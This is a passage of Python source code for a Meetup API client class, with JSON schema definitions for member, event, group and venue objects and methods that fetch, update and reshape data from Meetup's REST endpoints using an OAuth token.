'.': {
'extra_fields': True
},
'.birthday.day': {
'integer_data': True
},
'.birthday.month': {
'integer_data': True
},
'.birthday.year': {
'integer_data': True
},
'.id': {
'integer_data': True
},
'.joined': {
'integer_data': True
},
'.other_services': {
'extra_fields': True
},
'.other_services.facebook': {
'extra_fields': True
},
'.other_services.twitter': {
'extra_fields': True
},
'.other_services.linkedin': {
'extra_fields': True
},
'.stats.groups': {
'integer_data': True
},
'.stats.rsvps': {
'integer_data': True
},
'.stats.topics': {
'integer_data': True
}
}
},
'topic': {
'schema': {
'urlkey': 'diningout',
'lang': 'en_US',
'id': 713,
'name': 'Dining Out'
},
'components': {
'.id': {
'integer_data': True
}
}
},
'self': {
'schema': {
'actions': [''],
'common': {
'groups': [{}]
},
'blocks': False,
'friends': False
}
},
'group_profile': {
'schema': {
'created': 0,
'answers': [ {
'answer': '',
'question': '',
'question_id': 0
}],
'group': {},
'role': '',
'status': '',
'updated': 0,
'visited': 0
},
'components': {
'.': {
'extra_fields': True
},
'.created': {
'integer_data': True
},
'.updated': {
'integer_data': True
},
'.visited': {
'integer_data': True
}
}
},
'event': {
'schema': {
'id': '123456789',
'name': 'My Favorite Event',
'created': 1234567890000,
'updated': 1234567890000,
'visibility': 'public',
'status': 'upcoming',
'time': 1234567890000,
'utc_offset': -28800000,
'duration': 11700000,
'fee': {
'accepts': 'paypal',
'required': False,
'label': 'price',
'currency': 'USD',
'description': 'per person',
'amount': 5.0
},
'rsvp_rules': {
'close_time': 1234567890000,
'closed': False,
'guest_limit': 0,
'open_time': 1234567890000,
'refund_policy': {
'days': 3,
'notes': '',
'policies': [ '' ]
},
'waitlisting': 'auto'
},
'self': {
'actions': ['upload_photo'],
'rsvp': {
'answers': [
{
'answer': '',
'question': "do you like chocolate?",
'question_id': 12345678,
'updated': 1234567890000
}
],
'guests': 0,
'response': 'yes'
}
},
'survey_questions': [
{
'id': 12345678,
'question': 'tell me something i want to know'
}
],
'rsvp_limit': 200,
'yes_rsvp_count': 200,
'waitlist_count': 123,
'rsvpable': True,
'rsvpable_after_join': False,
'description': '<p>A long description</p>',
'comment_count': 1,
'how_to_find_us': 'open the door',
'group': {
'created': 1321563802000,
'id': 2829432,
'join_mode': 'approval',
'lat': 40.7599983215332,
'lon': -73.97000122070312,
'name': 'Data Driven NYC (a FirstMark Event)',
'urlname': 'DataDrivenNYC',
'who': 'Members'
},
'venue': {
'address_1': '731 Lexington Av. 7th Floor',
'city': 'New York',
'country': 'us',
'id': 5405082,
'lat': 40.761932373046875,
'localized_country_name': 'USA',
'lon': -73.96805572509766,
'name': 'Bloomberg LP',
'repinned': False,
'state': 'NY',
'zip': '10022'
},
'event_hosts': [ {
'id': 2369792,
'name': 'Matt Turck',
'photo': {
'base_url': 'http://photos4.meetupstatic.com',
'highres_link': 'http://photos2.meetupstatic.com/photos/member/1/9/2/4/highres_255546436.jpeg',
'id': 255546436,
'photo_link': 'http://photos2.meetupstatic.com/photos/member/1/9/2/4/member_255546436.jpeg',
'thumb_link': 'http://photos4.meetupstatic.com/photos/member/1/9/2/4/thumb_255546436.jpeg',
'type': 'member'
}
} ],
'short_link': 'http://meetu.ps/e/df6Ju/GlGy/i',
'link': 'https://www.meetup.com/mygroup/events/123456789/'
},
'components': {
'.created': {
'integer_data': True
},
'.updated': {
'integer_data': True
},
'.time': {
'integer_data': True
},
'.utc_offset': {
'integer_data': True
},
'.duration': {
'integer_data': True
},
'.rsvp_limit': {
'integer_data': True
},
'.yes_rsvp_count': {
'integer_data': True
},
'.waitlist_count': {
'integer_data': True
},
'.comment_count': {
'integer_data': True
},
'.fee': {
'extra_fields': True
},
'.rsvp_rules': {
'extra_fields': True
},
'.rsvp_rules.open_time': {
'integer_data': True
},
'.rsvp_rules.close_time': {
'integer_data': True
},
'.rsvp_rules.guest_limit': {
'integer_data': True
},
'.rsvp_rules.refund_policy.days': {
'integer_data': True
},
'.rsvp_rules.refund_policy': {
'extra_fields': True
},
'.self': {
'extra_fields': True
},
'.self.rsvp': {
'extra_fields': True
},
'.self.rsvp.answers[0]': {
'extra_fields': True
},
'.self.rsvp.answers[0].question_id': {
'integer_data': True
},
'.self.rsvp.answers[0].updated': {
'integer_data': True
},
'.self.rsvp.guests': {
'integer_data': True
},
'.survey_questions[0]': {
'extra_fields': True
},
'.survey_questions[0].id': {
'integer_data': True
},
'.group': {
'extra_fields': True
},
'.venue': {
'extra_fields': True
},
'.event_hosts[0]': {
'extra_fields': True
},
'.event_hosts[0].id': {
'integer_data': True
},
'.event_hosts[0].photo.id': {
'integer_data': True
},
'.event_hosts[0].photo': {
'extra_fields': True
}
}
},
'event_group': {
'schema': {
'created': 0,
'id': 0,
'join_mode': '',
'lat': 0.0,
'lon': 0.0,
'name': '',
'urlname': '',
'who': ''
},
'components': {
'.id': {
'integer_data': True
},
'.created': {
'integer_data': True
}
}
},
'group_brief': {
'schema': {
'group_photo': {
'base_url': '',
'highres_link': '',
'id': 0,
'photo_link': '',
'thumb_link': '',
'type': ''
},
'id': 0,
'join_mode': '',
'key_photo': {
'base_url': '',
'highres_link': '',
'id': 0,
'photo_link': '',
'thumb_link': '',
'type': ''
},
'members': 0,
'name': '',
'urlname': '',
'who': ''
},
'components': {
'.id': {
'integer_data': True
},
'.group_photo': {
'extra_fields': True
},
'.group_photo.id': {
'integer_data': True
},
'.key_photo': {
'extra_fields': True
},
'.key_photo.id': {
'integer_data': True
},
'.members': {
'integer_data': True
}
}
},
'group': {
'schema': {
'category': {
'id': 0,
'name': '',
'shortname': '',
'sort_name': ''
},
'city': '',
'country': '',
'created': 0,
'description': '',
'group_photo': {},
'id': 0,
'join_info': {
'photo_req': False,
'questions': [ {
'id': 0,
'question': ''
} ],
'questions_req': False
},
'join_mode': '',
'key_photo': {},
'last_event': {},
'lat': 0.0,
'link': '',
'localized_country_name': '',
'lon': 0.0,
'members': 0,
'membership_dues': {
'currency': '',
'fee': 0.0,
'fee_desc': '',
'methods': {
'amazon_payment': False,
'credit_card': False,
'other': False,
'paypal': False
},
'reasons': [ '' ],
'reasons_other': '',
'refund_policy': {},
'required': False,
'required_to': '',
'self_payment_required': False,
'trial_days': 0
},
'name': '',
'next_event': {},
'organizer': {
'bio': '',
'id': 0,
'name': '',
'photo': {}
},
'photos': [ {} ],
'score': 0.0,
'state': '',
'timezone': '',
'urlname': '',
'visibility': '',
'who': ''
},
'components': {
'.': {
'extra_fields': True
},
'.category.id': {
'integer_data': True
},
'.created': {
'integer_data': True
},
'.id': {
'integer_data': True
},
'.members': {
'integer_data': True
},
'.membership_dues.trial_days': {
'integer_data': True
},
'.organizer.id': {
'integer_data': True
},
'.organizer': {
'extra_fields': True
},
}
},
'event_brief': {
'schema': {
'id': '',
'name': '',
'time': 0,
'utc_offset': 0,
'yes_rsvp_count': 0
},
'components': {
'.': {
'extra_fields': True
},
'.time': {
'integer_data': True
},
'.utc_offset': {
'integer_data': True
},
'.yes_rsvp_count': {
'integer_data': True
}
}
},
'photo': {
'schema': {
'base_url': '',
'highres_link': '',
'id': 0,
'photo_link': '',
'thumb_link': '',
'type': ''
},
'components': {
'.': {
'extra_fields': True
},
'.id': {
'integer_data': True
}
}
},
'venue': {
'schema': {
'address_1': '',
'address_2': '',
'address_3': '',
'city': '',
'country': '',
'distance': 0,
'email': '',
'fax': '',
'id': 0,
'lat': 0.0,
'localized_country_name': '',
'lon': 0.0,
'name': '',
'phone': '',
'rating': 0,
'rating_count': 0,
'repinned': False,
'state': '',
'visibility': 'public',
'zip': ''
},
'components': {
'.visibility': {
'default_value': 'public'
},
'.id': {
'integer_data': True
},
'.distance': {
'integer_data': True
},
'.rating': {
'integer_data': True
},
'.rating_count': {
'integer_data': True
}
}
},
'attendee': {
'schema': {
'created': 0,
'event': {},
'group': {},
'guests': 0,
'member': {'bio': '',
'event_context': {'host': False},
'id': 0,
'name': '',
'photo': {
'base_url': '',
'highres_link': '',
'id': 0,
'photo_link': '',
'thumb_link': '',
'type': ''
},
'role': '',
'title': ''
},
'response': '',
'updated': 0,
'venue': {}
},
'components': {
'.': {
'extra_fields': True
},
'.member': {
'extra_fields': True
},
'.member.event_context': {
'extra_fields': True
},
'.created': {
'integer_data': True
},
'.member.id': {
'integer_data': True
},
'.updated': {
'integer_data': True
},
'.guests': {
'integer_data': True
}
}
},
'location': {
'schema':{
'city': '',
'country': '',
'lat': 0.0,
'localized_country_name': '',
'lon': 0.0,
'name_string': '',
'state': '',
'zip': ''
}
}
}
def __init__(self, access_token, service_scope, usage_client=None, requests_handler=None):
''' initialization method for meetup client class
:param access_token: string with access token for user provided by meetup oauth
:param service_scope: dictionary with service type permissions
:param usage_client: [optional] callable that records usage data
:param requests_handler: [optional] callable that handles requests errors
'''
title = '%s.__init__' % self.__class__.__name__
# construct class field model
from jsonmodel.validators import jsonModel
self.fields = jsonModel(self._class_fields)
# construct class object models
object_models = {}
for key, value in self._class_objects.items():
object_models[key] = jsonModel(value)
from labpack.compilers.objects import _method_constructor
self.objects = _method_constructor(object_models)
# validate inputs
input_fields = {
'access_token': access_token,
'service_scope': service_scope
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct class properties
self.access_token = access_token
self.service_scope = service_scope
self.endpoint = self.fields.schema['api_endpoint']
# construct method handlers
self.requests_handler = requests_handler
self.service_handler = meetupHandler(usage_client)
def _get_request(self, url, headers=None, params=None):
import requests
# construct request kwargs
request_kwargs = {
'url': url,
'headers': {'Authorization': 'Bearer %s' % self.access_token},
'params': {}
}
if headers:
request_kwargs['headers'].update(headers)
if params:
request_kwargs['params'].update(params)
# send request
try:
response = requests.get(**request_kwargs)
except Exception:
if self.requests_handler:
request_kwargs['method'] = 'GET'
request_object = requests.Request(**request_kwargs)
return self.requests_handler(request_object)
else:
raise
# handle response
response_details = self.service_handler.handle(response)
return response_details
def _post_request(self, url, headers=None, params=None):
import requests
# construct request kwargs
request_kwargs = {
'url': url,
'headers': {'Authorization': 'Bearer %s' % self.access_token},
'params': {}
}
if headers:
request_kwargs['headers'].update(headers)
if params:
request_kwargs['params'].update(params)
# send request
try:
response = requests.post(**request_kwargs)
except Exception:
if self.requests_handler:
request_kwargs['method'] = 'POST'
request_object = requests.Request(**request_kwargs)
return self.requests_handler(request_object)
else:
raise
# handle response
response_details = self.service_handler.handle(response)
return response_details
def _delete_request(self, url, headers=None, params=None):
import requests
# construct request kwargs
request_kwargs = {
'url': url,
'headers': {'Authorization': 'Bearer %s' % self.access_token},
'params': {}
}
if headers:
request_kwargs['headers'].update(headers)
if params:
request_kwargs['params'].update(params)
# send request
try:
response = requests.delete(**request_kwargs)
except Exception:
if self.requests_handler:
request_kwargs['method'] = 'DELETE'
request_object = requests.Request(**request_kwargs)
return self.requests_handler(request_object)
else:
raise
# handle response
response_details = self.service_handler.handle(response)
return response_details
def _patch_request(self, url, headers=None, params=None):
import requests
# construct request kwargs
request_kwargs = {
'url': url,
'headers': {'Authorization': 'Bearer %s' % self.access_token},
'params': {}
}
if headers:
request_kwargs['headers'].update(headers)
if params:
request_kwargs['params'].update(params)
# send request
try:
response = requests.patch(**request_kwargs)
except Exception:
if self.requests_handler:
request_kwargs['method'] = 'PATCH'
request_object = requests.Request(**request_kwargs)
return self.requests_handler(request_object)
else:
raise
# handle response
response_details = self.service_handler.handle(response)
return response_details
def _reconstruct_event(self, event_details):
# handle self key exception for jsonmodel.ingest class method
self_details = {}
self_schema = {}
if 'self' in event_details.keys():
self_details = event_details['self']
self_schema = self.objects.event.schema['self']
del event_details['self']
# ingest top level object
event_details = self.objects.event.ingest(**event_details)
# ingest lower level objects
event_details['self'] = self.objects.event._ingest_dict(self_details, self_schema, '.self')
event_details['venue'] = self.objects.venue.ingest(**event_details['venue'])
event_details['group'] = self.objects.event_group.ingest(**event_details['group'])
return event_details
def _reconstruct_group(self, group_details):
# ingest top level object
group_details = self.objects.group.ingest(**group_details)
# ingest lower level objects
group_details['last_event'] = self.objects.event_brief.ingest(**group_details['last_event'])
group_details['next_event'] = self.objects.event_brief.ingest(**group_details['next_event'])
group_details['group_photo'] = self.objects.photo.ingest(**group_details['group_photo'])
group_details['key_photo'] = self.objects.photo.ingest(**group_details['key_photo'])
group_details['organizer']['photo'] = self.objects.photo.ingest(**group_details['organizer']['photo'])
for photo in group_details['photos']:
photo = self.objects.photo.ingest(**photo)
return group_details
def _reconstruct_member(self, member_details):
# remove self key from details
self_details = {}
if 'self' in member_details.keys():
self_details = member_details['self']
del member_details['self']
# ingest top level object
member_details = self.objects.profile.ingest(**member_details)
# re-integrate self key
member_details['self'] = self.objects.self.ingest(**self_details)
common_groups = []
for group in member_details['self']['common']['groups']:
common_groups.append(self.objects.group_brief.ingest(**group))
member_details['self']['common']['groups'] = common_groups
# ingest lower level objects
member_details['group_profile'] = self.objects.group_profile.ingest(**member_details['group_profile'])
group_details = member_details['group_profile']['group']
member_details['group_profile']['group'] = self.objects.group_brief.ingest(**group_details)
member_details['photo'] = self.objects.photo.ingest(**member_details['photo'])
# ingest last and next event objects
self_details = {}
if 'self' in member_details['last_event'].keys():
self_details = member_details['last_event']['self']
del member_details['last_event']['self']
member_details['last_event'] = self.objects.event_brief.ingest(**member_details['last_event'])
member_details['last_event']['self'] = self.objects.self.ingest(**self_details)
self_details = {}
if 'self' in member_details['next_event'].keys():
self_details = member_details['next_event']['self']
del member_details['next_event']['self']
member_details['next_event'] = self.objects.event_brief.ingest(**member_details['next_event'])
member_details['next_event']['self'] = self.objects.self.ingest(**self_details)
return member_details
def _reconstruct_attendee(self, attendee_details):
# ingest top level object
attendee_details = self.objects.attendee.ingest(**attendee_details)
# ingest lower level objects
attendee_details['group'] = self.objects.group_brief.ingest(**attendee_details['group'])
attendee_details['event'] = self.objects.event_brief.ingest(**attendee_details['event'])
attendee_details['venue'] = self.objects.venue.ingest(**attendee_details['venue'])
photo_details = attendee_details['member']['photo']
attendee_details['member']['photo'] = self.objects.photo.ingest(**photo_details)
return attendee_details
def get_member_brief(self, member_id=0):
''' a method to retrieve member profile info
:param member_id: [optional] integer with member id from member profile
:return: dictionary with member profile inside [json] key
member_profile = self.objects.profile_brief.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#get
title = '%s.get_member_brief' % self.__class__.__name__
# validate inputs
input_fields = {
'member_id': member_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/members/' % self.endpoint
params = {
'member_id': 'self'
}
if member_id:
params['member_id'] = member_id
# send request
response_details = self._get_request(url, params=params)
# construct method output dictionary
profile_details = {
'json': {}
}
for key, value in response_details.items():
if not key == 'json':
profile_details[key] = value
# parse response
if response_details['json']:
if 'results' in response_details['json'].keys():
if response_details['json']['results']:
details = response_details['json']['results'][0]
for key, value in details.items():
if key != 'topics':
profile_details['json'][key] = value
profile_details['json'] = self.objects.profile_brief.ingest(**profile_details['json'])
return profile_details
def get_member_profile(self, member_id):
''' a method to retrieve member profile details
:param member_id: integer with member id from member profile
:return: dictionary with member profile details inside [json] key
profile_details = self.objects.profile.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#get
title = '%s.get_member_profile' % self.__class__.__name__
# validate inputs
input_fields = {
'member_id': member_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct member id
if not member_id:
raise IndexError('%s requires member id argument.' % title)
# compose request fields
url = '%s/members/%s' % (self.endpoint, str(member_id))
params = {
'fields': 'gender,birthday,last_event,messaging_pref,next_event,other_services,privacy,self,stats'
}
# send requests
profile_details = self._get_request(url, params=params)
# construct method output
if profile_details['json']:
profile_details['json'] = self._reconstruct_member(profile_details['json'])
return profile_details
def update_member_profile(self, brief_details, profile_details):
''' a method to update user profile details on meetup
:param brief_details: dictionary with member brief details with updated values
:param profile_details: dictionary with member profile details with updated values
:return: dictionary with partial profile details inside [json] key
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#edit
title = '%s.update_member_profile' % self.__class__.__name__
# validate permissions
if not 'profile_edit' in self.service_scope:
            raise ValueError('%s requires profile_edit as part of oauth2 service_scope permissions.' % title)
# validate inputs
brief_details = self.objects.profile_brief.validate(brief_details)
profile_details = self.objects.profile.validate(profile_details)
# construct request fields
url = '%s/members/%s' % (self.endpoint, str(profile_details['id']))
params = {
'bio': profile_details['bio'],
'bio_privacy': profile_details['privacy']['bio'],
'fields': 'gender,birthday,last_event,messaging_pref,next_event,other_services,privacy,self,stats',
'gender': profile_details['gender'],
'groups_privacy': profile_details['privacy']['groups'],
'lang': brief_details['lang'].replace('_', '-'),
'lat': str(profile_details['lat']),
'lon': str(profile_details['lon']),
'messaging_pref': profile_details['messaging_pref'],
'name': profile_details['name'],
'photo_id': profile_details['photo']['id'],
'sync_photo': True,
'topics_privacy': profile_details['privacy']['topics'],
'zip': brief_details['zip']
}
if profile_details['privacy']['facebook']:
params['facebook_privacy'] = profile_details['privacy']['facebook']
birthday_value = False
for key, value in profile_details['birthday'].items():
if value:
birthday_value = True
break
if not birthday_value:
params['birthday'] = '-1'
else:
birthday_string = ''
b_day = profile_details['birthday']
if b_day['day'] and b_day['month']:
if b_day['month'] < 10:
birthday_string += '0'
birthday_string += str(b_day['month'])
if b_day['day'] < 10:
birthday_string += '0'
birthday_string += str(b_day['day'])
birthday_string += str(b_day['year'])
params['birthday'] = birthday_string
# send requests
profile_details = self._patch_request(url, params=params)
return profile_details
def list_member_topics(self, member_id):
''' a method to retrieve a list of topics member follows
:param member_id: integer with meetup member id
:return: dictionary with list of topic details inside [json] key
topic_details = self.objects.topic.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#get
title = '%s.list_member_topics' % self.__class__.__name__
# validate inputs
input_fields = {
'member_id': member_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct member id
if not member_id:
raise IndexError('%s requires member id argument.' % title)
# compose request fields
url = '%s/members/%s' % (self.endpoint, str(member_id))
params = {
'fields': 'topics'
}
# send requests
response_details = self._get_request(url, params=params)
# construct method output dictionary
member_topics = {
'json': []
}
for key, value in response_details.items():
if not key == 'json':
member_topics[key] = value
# parse response
if response_details['json']:
if 'topics' in response_details['json'].keys():
for topic in response_details['json']['topics']:
member_topics['json'].append(self.objects.topic.ingest(**topic))
return member_topics
def list_member_groups(self, member_id):
''' a method to retrieve a list of meetup groups member belongs to
:param member_id: integer with meetup member id
:return: dictionary with list of group details in [json]
group_details = self.objects.group_profile.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#get
title = '%s.list_member_groups' % self.__class__.__name__
# validate inputs
input_fields = {
'member_id': member_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct member id
if not member_id:
raise IndexError('%s requires member id argument.' % title)
# compose request fields
url = '%s/members/%s' % (self.endpoint, str(member_id))
params = {
'fields': 'memberships'
}
# send requests
response_details = self._get_request(url, params=params)
# construct method output dictionary
member_groups = {
'json': []
}
for key, value in response_details.items():
if not key == 'json':
member_groups[key] = value
# parse response
if response_details['json']:
if 'memberships' in response_details['json'].keys():
for group in response_details['json']['memberships']['member']:
member_groups['json'].append(self.objects.group_profile.ingest(**group))
return member_groups
def list_member_events(self, upcoming=True):
''' a method to retrieve a list of events member attended or will attend
:param upcoming: [optional] boolean to filter list to only future events
:return: dictionary with list of event details inside [json] key
event_details = self._reconstruct_event({})
'''
# https://www.meetup.com/meetup_api/docs/self/events/
# construct request fields
url = '%s/self/events' % self.endpoint
params = {
'status': 'past',
'fields': 'comment_count,event_hosts,rsvp_rules,short_link,survey_questions,rsvpable'
}
if upcoming:
params['status'] = 'upcoming'
# send requests
response_details = self._get_request(url, params=params)
# construct method output
member_events = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
member_events[key] = value
for event in response_details['json']:
member_events['json'].append(self._reconstruct_event(event))
return member_events
def get_member_calendar(self, max_results=0):
''' a method to retrieve the upcoming events for all groups member belongs to
:param max_results: [optional] integer with number of events to include
:return: dictionary with list of event details inside [json] key
event_details = self._reconstruct_event({})
'''
# https://www.meetup.com/meetup_api/docs/self/calendar/#list
title = '%s.get_member_calendar' % self.__class__.__name__
# validate inputs
input_fields = {
'max_results': max_results
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/self/calendar' % self.endpoint
params = {
'fields': 'comment_count,event_hosts,rsvp_rules,short_link,survey_questions,rsvpable'
}
if max_results:
params['page'] = str(max_results)
# send requests
response_details = self._get_request(url, params=params)
# construct method output
member_calendar = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
member_calendar[key] = value
for event in response_details['json']:
member_calendar['json'].append(self._reconstruct_event(event))
return member_calendar
def list_groups(self, topics=None, categories=None, text='', country_code='', latitude=0.0, longitude=0.0, location='', radius=0.0, zip_code='', max_results=0, member_groups=True):
''' a method to find meetup groups based upon a number of filters
:param topics: [optional] list of integer meetup ids for topics
:param text: [optional] string with words in groups to search
:param country_code: [optional] string with two character country code
:param latitude: [optional] float with latitude coordinate at center of geo search
:param longitude: [optional] float with longitude coordinate at center of geo search
:param location: [optional] string with meetup location name fields to search
:param radius: [optional] float with distance from center of geographic search
:param zip_code: [optional] string with zip code of geographic search
:param max_results: [optional] integer with number of groups to include
:param member_groups: [optional] boolean to include groups member belongs to
:return: dictionary with list of group details inside [json] key
group_details = self._reconstruct_group(**{})
'''
# https://www.meetup.com/meetup_api/docs/find/groups/
title = '%s.list_groups' % self.__class__.__name__
# validate inputs
input_fields = {
'categories': categories,
'topics': topics,
'text': text,
'country_code': country_code,
'latitude': latitude,
'longitude': longitude,
'location': location,
'radius': radius,
'zip_code': zip_code,
'max_results': max_results
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/find/groups' % self.endpoint
params = {
'fields': 'last_event,next_event,join_info',
'self_groups': 'include'
}
if not member_groups:
params['self_groups'] = 'exclude'
if max_results:
params['page'] = str(max_results)
if categories:
params['category'] = ','.join(str(item) for item in categories)
if topics:
            params['topic_id'] = ','.join(str(item) for item in topics)
if text:
params['text'] = text
if country_code:
params['country'] = country_code.lower()
if latitude:
params['lat'] = str(latitude)
if longitude:
params['lon'] = str(longitude)
if location:
params['location'] = location
if radius:
params['radius'] = str(radius)
if zip_code:
params['zip'] = zip_code
# send request
response_details = self._get_request(url, params=params)
# construct method output
meetup_groups = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
meetup_groups[key] = value
for group in response_details['json']:
meetup_groups['json'].append(self._reconstruct_group(group))
return meetup_groups
def get_group_details(self, group_url='', group_id=0):
''' a method to retrieve details about a meetup group
:param group_url: string with meetup urlname of group
:param group_id: int with meetup id for group
:return: dictionary with group details inside [json] key
group_details = self._reconstruct_group(**{})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/#get
title = '%s.get_group_details' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url,
'group_id': group_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
if not group_url and not group_id:
raise IndexError('%s requires either a group_url or group_id argument.' % title)
# construct request fields
if group_id:
url = '%s/2/groups?fields=last_event,next_event,join_info&group_id=%s' % (self.endpoint, group_id)
else:
url = '%s/%s?fields=last_event,next_event,join_info' % (self.endpoint, group_url)
# send request
group_details = self._get_request(url)
        # construct method output
if group_id:
if 'results' in group_details['json'].keys():
if group_details['json']['results']:
group_details['json'] = self._reconstruct_group(group_details['json']['results'][0])
else:
group_details['json'] = self._reconstruct_group(group_details['json'])
return group_details
def list_group_events(self, group_url, upcoming=True):
''' a method to retrieve a list of upcoming events hosted by group
:param group_url: string with meetup urlname field of group
:param upcoming: [optional] boolean to filter list to only future events
:return: dictionary with list of event details inside [json] key
event_details = self._reconstruct_event({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/#list
title = '%s.list_group_events' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events' % (self.endpoint, group_url)
params = {
'status': 'past',
'fields': 'comment_count,event_hosts,rsvp_rules,short_link,survey_questions,rsvpable'
}
if upcoming:
params['status'] = 'upcoming'
# send request
response_details = self._get_request(url, params=params)
# construct method output
group_events = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
group_events[key] = value
for event in response_details['json']:
group_events['json'].append(self._reconstruct_event(event))
return group_events
def list_group_members(self, group_url, max_results=0):
''' a method to retrieve a list of members for a meetup group
:param group_url: string with meetup urlname for group
:param max_results: [optional] integer with number of members to include
:return: dictionary with list of member details inside [json] key
member_details = self._reconstruct_member({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/members/#list
title = '%s.list_group_members' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url,
'max_results': max_results
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/members' % (self.endpoint, group_url)
params = {
'fields': 'gender,birthday,last_event,messaging_pref,next_event,other_services,privacy,self,stats'
}
if max_results:
params['page'] = str(max_results)
# send request
response_details = self._get_request(url, params=params)
# reconstruct method output
group_members = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
group_members[key] = value
for member in response_details['json']:
group_members['json'].append(self._reconstruct_member(member))
return group_members
def get_event_details(self, group_url, event_id):
''' a method to retrieve details for an event
:param group_url: string with meetup urlname for host group
:param event_id: integer with meetup id for event
:return: dictionary with list of event details inside [json] key
event_details = self._reconstruct_event({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/:id/#get
title = '%s.get_event_details' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url,
'event_id': event_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events/%s' % (self.endpoint, group_url, str(event_id))
params = {
'fields': 'comment_count,event_hosts,rsvp_rules,short_link,survey_questions,rsvpable,rsvpable_after_join'
}
# send request
event_details = self._get_request(url, params=params)
# construct method output
if event_details['json']:
event_details['json'] = self._reconstruct_event(event_details['json'])
return event_details
def list_event_attendees(self, group_url, event_id):
''' a method to retrieve attendee list for event from meetup api
:param group_url: string with meetup urlname for host group
:param event_id: integer with meetup id for event
:return: dictionary with list of attendee details inside [json] key
attendee_details = self._reconstruct_attendee({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/:event_id/rsvps/#list
title = '%s.list_event_attendees' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url,
'event_id': event_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events/%s/rsvps' % (self.endpoint, group_url, str(event_id))
# send request
response_details = self._get_request(url)
# construct method output
event_attendees = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
event_attendees[key] = value
for attendee in response_details['json']:
event_attendees['json'].append(self._reconstruct_attendee(attendee))
return event_attendees
def get_venue_details(self, venue_id):
''' a method to retrieve venue details from meetup api
:param venue_id: integer for meetup id for venue
:return: dictionary with venue details inside [json] key
venue_details = self.objects.venue.schema
'''
title = '%s.get_venue_details' % self.__class__.__name__
# validate inputs
input_fields = {
'venue_id': venue_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/2/venues' % self.endpoint
params = {
'venue_id': str(venue_id)
}
# send request
venue_details = self._get_request(url, params=params)
# reconstruct method output
if venue_details['json']:
if 'results' in venue_details['json'].keys():
if venue_details['json']['results']:
details = venue_details['json']['results'][0]
venue_details['json'] = self.objects.venue.ingest(**details)
return venue_details
def list_locations(self, latitude=0.0, longitude=0.0, zip_code='', city_name='', max_results=0):
''' a method to retrieve location address details based upon search parameters
:param latitude: [optional] float with latitude coordinate at center of geo search
:param longitude: [optional] float with longitude coordinate at center of geo search
:param city_name: [optional] string with name of city for search
:param zip_code: [optional] string with zip code of geographic search
:param max_results: [optional] integer with number of groups to include
:return: dictionary with list of location details inside [json] key
location_details = self.objects.location.schema
'''
# https://www.meetup.com/meetup_api/docs/find/locations/
title = '%s.list_locations' % self.__class__.__name__
# validate inputs
input_fields = {
'latitude': latitude,
'longitude': longitude,
'zip_code': zip_code,
'city_name': city_name,
'max_results': max_results
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# validate requirements
if latitude or longitude:
if not latitude or not longitude:
raise IndexError('%s coordinate search requires both latitude and longitude arguments.' % title)
# construct request fields
url = '%s/find/locations' % self.endpoint
params = {}
if max_results:
params['page'] = str(max_results)
if latitude:
params['lat'] = str(latitude)
if longitude:
params['lon'] = str(longitude)
elif zip_code:
params['query'] = zip_code
elif city_name:
params['query'] = city_name
# send request
response_details = self._get_request(url, params=params)
# construct method output
meetup_locations = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
meetup_locations[key] = value
for location in response_details['json']:
meetup_locations['json'].append(location)
return meetup_locations
